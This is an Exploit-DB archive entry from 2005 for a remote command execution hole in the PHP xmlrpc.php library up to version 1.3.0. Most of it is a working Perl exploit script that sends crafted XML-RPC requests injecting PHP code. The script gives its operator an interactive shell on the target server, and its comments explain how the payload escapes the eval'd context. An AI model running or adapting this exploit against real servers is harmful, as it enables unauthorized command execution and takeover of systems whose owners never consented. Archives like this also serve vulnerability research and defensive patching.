xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit 2

2005-07-04T00:00:00
ID EDB-ID:1083
Type exploitdb
Reporter dukenn
Modified 2005-07-04T00:00:00

Description

Remote command execution exploit (2) for the xmlrpc.php library, versions <= 1.3.0: an interactive shell that injects PHP code into an XML-RPC request body. Webapps exploit for the PHP platform.

                                        
                                            #-------------------------------------------------------#
#                     /|                                #       
#                    | |                                #      
#                    | |                                #      
#       /\   ________| |___                             #       
#      /  \  \_______   __/                             #
#     /    \|\_____  | | _       _  _     _  ()___      #      
#    /  /\  \  ___ \ | |&lt;_&gt;  /  |  |  | || \ || | | |   #       
#   /  /__\  \|   \ || | _  /__ |_ |  | ||_/ || | |_|   #       
#  /  ______  \   | || || |   / |  |  | || \ || |   |   #       
# /  /      \  \  | || || |  /  |_ |_ |_||  \|| | \_|   #       
# \_/       |\_/  | || || | ___ _  _                    #       
#           | |   | || /| |  | |  | ||\/|               #       
#            \|    \||/  \|  | |_ |_||  |               #       
#                            | |  | ||  |               #       
#                            | |_ | ||  |               #       
#                                                       #
#         Original advisory by http://gulftech.org/     #
#         Exploit coded by dukenn (http://asteam.org)   #
#                                                       # 
#-------------------------------------------------------

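#!/usr/bin/perl
#
# Interactive command shell over the xmlrpc.php <= 1.3.0 PHP eval() injection
# (original advisory by GulfTech). The request built below places attacker
# text inside an XML <name> element; the payload closes the string/call
# context the library evaluates it in ("',''));"), runs the operator's command
# with PHP backticks between '_begin_' and '_end_' marker lines, calls exit,
# and comments out whatever follows with "/*".
#
# Usage: perl xml.pl <host> <path_to_xmlrpc.php>
#
# Caveats:
#   * The command is interpolated verbatim into both the XML body and the PHP
#     backtick string; commands containing '<', '&', '`' or quotes break the
#     payload instead of being escaped.
#   * Only plain HTTP on port 80 is supported.
#   * The shebang is not on line 1 of this listing, so run the script through
#     the perl interpreter as shown in the usage line.

use strict;
use warnings;
use IO::Socket;

$| = 1;    # the prompt is printed without a newline; flush it immediately

print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";

unless ($ARGV[0] && $ARGV[1]) {
    print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
    print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
    exit;
}

my ($host, $xml) = @ARGV[0, 1];

# A single connection is reused for every command (HTTP/1.1 persistent
# connection). If the server closes it after a response, the next command is
# reported as "Exploit Failed" rather than reconnecting.
my $sock = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => "80",
) or die "connecterror\n";

while (1) {
    print '[' . $host . ']# ';
    my $cmd = <STDIN>;
    # EOF on stdin (Ctrl-D, closed pipe): stop instead of looping forever
    # sending empty commands.
    last unless defined $cmd;
    # chomp, not chop: an unterminated last line must not lose its final char.
    chomp $cmd;
    last if $cmd eq 'exit';

    # Payload: break out of the eval'd string/call, wrap the command output in
    # markers, stop PHP, and comment out the rest of the evaluated code.
    my $xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName>"
        . "<params><param><value><name>',''));echo '_begin_\n';echo `" . $cmd
        . "`;echo '_end_';exit;/*</name></value></param></params></methodCall>";

    # HTTP requires CRLF line endings and an empty line before the body.
    print $sock "POST " . $xml . " HTTP/1.1\r\n";
    print $sock "Host: " . $host . "\r\n";
    print $sock "Content-Type: text/xml\r\n";
    print $sock "Content-Length: " . length($xmldata) . "\r\n\r\n" . $xmldata;

    # Echo everything from the _begin_ line up to and including the _end_
    # line. If the server keeps the connection open but never sends _end_,
    # this read blocks; no timeout is applied.
    my $in_output = 0;
    while (my $ans = <$sock>) {
        print $ans if $in_output;
        last if $ans =~ /^_end_/;
        $in_output = 1 if $ans =~ /^_begin_/;
    }
    if (!$in_output) {
        print "Exploit Failed\n";
        exit;
    }
}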

# milw0rm.com [2005-07-04]